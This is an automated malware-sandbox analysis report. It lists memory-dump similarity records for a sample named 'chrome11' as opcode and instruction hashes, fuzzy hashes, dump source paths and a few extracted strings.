                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 179f050c8ab1a5666e91c1a587617f4d61b8ba0cf1226a5d6e8968025713ba30
                                                • Instruction ID: d4a7d51c1ffbb370b2541a89fcb5892d0da09c723428a56d73ca5bc36a98aced
                                                • Opcode Fuzzy Hash: 179f050c8ab1a5666e91c1a587617f4d61b8ba0cf1226a5d6e8968025713ba30
                                                • Instruction Fuzzy Hash: DA315E70A08A4D8FDB45EFA8D4556EDBBF1FF59710F40017AE409E3292CB78A851CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cad008c613c751ab64ed4934d33ced59756e8d33614ca5e68cf34ee757515f4
                                                • Instruction ID: a0d33fd65850e6dfd906ae44b0f515d48f7abac0dcfc6de7441bed288629ef97
                                                • Opcode Fuzzy Hash: 8cad008c613c751ab64ed4934d33ced59756e8d33614ca5e68cf34ee757515f4
                                                • Instruction Fuzzy Hash: FD31AB7081828ADFDB05DF64C8456EDBBF0FF05344F0541BAE859C7292DB38AA54CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcbd89d97ec35f5d04f2d2462bf47ddff0e9dcad937b5db58bb635323ac885c7
                                                • Instruction ID: 8dd7ed60d45e3577f3f8074ac1e408b6b2810e4771fe305495c90274e3a2336d
                                                • Opcode Fuzzy Hash: bcbd89d97ec35f5d04f2d2462bf47ddff0e9dcad937b5db58bb635323ac885c7
                                                • Instruction Fuzzy Hash: 5D113D70D4895E9FDBA9DB18C885BA877F1FB6A740F0440EAC00DE7695DA745EC4CB00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7863f0de284f74d1d7a7a3297945c332dd6cbc8483f87a38715ad7a08f73987c
                                                • Instruction ID: 35b7efc556ab8c5c82697b5dc2134e9ebbd6ee8fddd28c89a6dc63ffe664d4b7
                                                • Opcode Fuzzy Hash: 7863f0de284f74d1d7a7a3297945c332dd6cbc8483f87a38715ad7a08f73987c
                                                • Instruction Fuzzy Hash: D11118B1D4495D8FDF88EF98C485AEDB7B1FF59340F400129D00AE7659DB356841CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b67b0dc7086bd448c0283068cadf7b15fd1480c49ee236104b48d0b71f1be7fa
                                                • Instruction ID: e64c6c3ddb233bfbbc724759dec73ef9c4b5aaad6fbc0d56cfabe3263d6c30c9
                                                • Opcode Fuzzy Hash: b67b0dc7086bd448c0283068cadf7b15fd1480c49ee236104b48d0b71f1be7fa
                                                • Instruction Fuzzy Hash: 55113C70D09A89CFEB85EF6C9454AAD7BB2FF6A780B54056AC40DCB245CA349882CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f62a71588da34b29938b14fe22da3222f840c6a9357b25dca7d3413efa74c90c
                                                • Instruction ID: ddaa2bd311310677174431fc992b0ded25c9f5b01e61930583a7f330e6417885
                                                • Opcode Fuzzy Hash: f62a71588da34b29938b14fe22da3222f840c6a9357b25dca7d3413efa74c90c
                                                • Instruction Fuzzy Hash: 4A012971D8891EDAEFA4DA599441BFDB3B0FB69780F1011BAC00DD3682DE385985CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e4b35f2c433bce9ac3a6b81ee8fd96b5a26c2eb65ad63bd0b46f62dc30d04fca
                                                • Instruction ID: ec88a75f119d2471801366b3c8b652052e213270fb5b5ad65e61746817cb1c08
                                                • Opcode Fuzzy Hash: e4b35f2c433bce9ac3a6b81ee8fd96b5a26c2eb65ad63bd0b46f62dc30d04fca
                                                • Instruction Fuzzy Hash: 95015270918A4E9FEF84EF18C858AAD77F0FF18341F000665D829C7195DB34E951C781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 998aa47bf153be83e78c3469d6656ee72971eff653aecc5e18dc157bee2e3fb3
                                                • Instruction ID: a49f3674554cf902b0bc49bad45aa85192347c02f6d8bbbfa354a348a2475ea0
                                                • Opcode Fuzzy Hash: 998aa47bf153be83e78c3469d6656ee72971eff653aecc5e18dc157bee2e3fb3
                                                • Instruction Fuzzy Hash: 1C014F7185868C8FDB84EF68C85A6DD7FF0FF58341F0506A6E818C3155DA389154CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e67c1ddc25ce5a259202f2f83fd235ecbbdff305493a413c1227be9c7dcc2ca
                                                • Instruction ID: ad78a064004d0c952f7adf46856f262c474e43a62d95aaaa8a728adb3bf281a4
                                                • Opcode Fuzzy Hash: 8e67c1ddc25ce5a259202f2f83fd235ecbbdff305493a413c1227be9c7dcc2ca
                                                • Instruction Fuzzy Hash: BAF09774D28A2C9FDF94EB98D885AEDB7F1FB68741F10006AE00DE3251CB34A981CB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 024fec4b5a41438a60dc42d91122b9723afc2630a6abea677132e5d0b59abc11
                                                • Instruction ID: e866f59fd6be4d89f3c3e3e27faa48683f08d4f0ceba9f6534818e86ddd2af55
                                                • Opcode Fuzzy Hash: 024fec4b5a41438a60dc42d91122b9723afc2630a6abea677132e5d0b59abc11
                                                • Instruction Fuzzy Hash: A0F0DA308097198EDBA9DB24C45A79DB2B2FF05341F5045FDD50DA6291CF3959C0CF00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a21e51dfa3b84159a5099ffb5ee52e8ac5d595bcb72711557f913abc05dd4fe
                                                • Instruction ID: 053468ccd738ad38e01fe88f1fa0cae4e0df12e0f933892d5c47e7be0f0277c6
                                                • Opcode Fuzzy Hash: 6a21e51dfa3b84159a5099ffb5ee52e8ac5d595bcb72711557f913abc05dd4fe
                                                • Instruction Fuzzy Hash: 7BD0222B4881830EC3425AF0B4810D8BBB0DE872753040073C288CF083DA6E018F8381
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43b650b5ab8cd34facaa2c034724a13130320b0d3f220b6843db0fcdd45512f2
                                                • Instruction ID: d1e36709cb3446ac5acb0f3e5cdff9d59aa7a5cc5da23d38ef4009aafd7d1af5
                                                • Opcode Fuzzy Hash: 43b650b5ab8cd34facaa2c034724a13130320b0d3f220b6843db0fcdd45512f2
                                                • Instruction Fuzzy Hash: CBE08C30D05A4ADFF396EF2C80455A87BB2FF56381B2001AAC40CCB6A6CE344886CB40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a6c1607cdb46ae075c1c78a14152a655c57525984c2bfebce805f1bd4985cba
                                                • Instruction ID: 8e0b2d32975c8755717a832f8427b4114c1a7443100b713238afe9d0d9bcf516
                                                • Opcode Fuzzy Hash: 6a6c1607cdb46ae075c1c78a14152a655c57525984c2bfebce805f1bd4985cba
                                                • Instruction Fuzzy Hash: 20D01730864A4E9FDB14AF64D9016EEB265FF04344F44067AE82DC2085DA38A6A8CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1e76e612a07234e0caed72ce633671519a52a25c6f70854cf690962059660443
                                                • Instruction ID: fe6dfb87b5ba4ef12fafadcb45e4208ec83b421aeba0a8458f5995535608f793
                                                • Opcode Fuzzy Hash: 1e76e612a07234e0caed72ce633671519a52a25c6f70854cf690962059660443
                                                • Instruction Fuzzy Hash: D9726E70D0864E8FDB49DF98C4A19BEB7B2FF98300F1441AED41AA7395CA356942CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e457da2daa692208e920f00d0f978166b6cedc91ec9c48cfe2898f917d11c8e
                                                • Instruction ID: a01c85da23748289690eafef16554399a1b29944160cf3213d55aea0357d1828
                                                • Opcode Fuzzy Hash: 9e457da2daa692208e920f00d0f978166b6cedc91ec9c48cfe2898f917d11c8e
                                                • Instruction Fuzzy Hash: 22326330A246098BDF1CDF98C8969BDB7B3FF94704F50426DD42A67295DE35B482CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 643ecd514bb7aec549b0397d97c835721ec90ea027ad89253c9fd79dcec12189
                                                • Instruction ID: de9d8ed8ef120e848301720770c4e6203dba85c63d8dc663a088c10a71f14049
                                                • Opcode Fuzzy Hash: 643ecd514bb7aec549b0397d97c835721ec90ea027ad89253c9fd79dcec12189
                                                • Instruction Fuzzy Hash: D7225130A246098BCF1CDF98C8969BDB7B3FF98704F50426DD46A67295DE31B442CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1cc4ab13f52b8c2701c58fe4dff26568f1ebd2b9509ec8cdd797116dcb45ab60
                                                • Instruction ID: ca20a14dd7b0a88815bb014699f55f94987dde2f61d105f145fefcd94d277e7c
                                                • Opcode Fuzzy Hash: 1cc4ab13f52b8c2701c58fe4dff26568f1ebd2b9509ec8cdd797116dcb45ab60
                                                • Instruction Fuzzy Hash: EDF19430908A4D8FEBA8DF28C8557ED77E2FF55350F04426AE84DC7295DB38A945CB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 316a02b9ec194db952a4851e60f784c88ce8d7e959e1a37af5fea702b8b3505d
                                                • Instruction ID: 6261674f4bffd3907e883d894ac860148f3bf148cc332f244457faac0567365c
                                                • Opcode Fuzzy Hash: 316a02b9ec194db952a4851e60f784c88ce8d7e959e1a37af5fea702b8b3505d
                                                • Instruction Fuzzy Hash: 2FF0AE30E5C92D8EDF90EB88E880BFDB7B5FF5A340F5021B1D01DE7146DA28A8818B54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "9H$"9H$"9H$"9H$"9H$"9H$"9H$"9H$b4H$r6H$r6H$r6H
                                                • API String ID: 0-1712693003
                                                • Opcode ID: 1fc1a8d747e10d5673c4c77be0229412c56e93006d4f58becc3761a43afdeeec
                                                • Instruction ID: 8778fe0f3d060fd5ffdcb3a658e809894c8d31c62c30575d17c845b7f2df49b4
                                                • Opcode Fuzzy Hash: 1fc1a8d747e10d5673c4c77be0229412c56e93006d4f58becc3761a43afdeeec
                                                • Instruction Fuzzy Hash: 27E1AE70E08A4A9FEB95EB6898513ACBBB1FF55340F5401FAC44DD7197DE282886CB02
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: }J$0pR$P~J$tR
                                                • API String ID: 0-2036870270
                                                • Opcode ID: 7f3853bdcb60cb0874f2e0762f8bd0af1ec591bfe3b1efdf3c1fd2035868c974
                                                • Instruction ID: d4b2bd427969667d90ad9e641197510d54b72123b77557736eda20ae5f1306d5
                                                • Opcode Fuzzy Hash: 7f3853bdcb60cb0874f2e0762f8bd0af1ec591bfe3b1efdf3c1fd2035868c974
                                                • Instruction Fuzzy Hash: 31C1E221A4CA8E4FE795DB2C9459A7877F2FF99790B4801BAD00DCB1A7ED2C9C45C341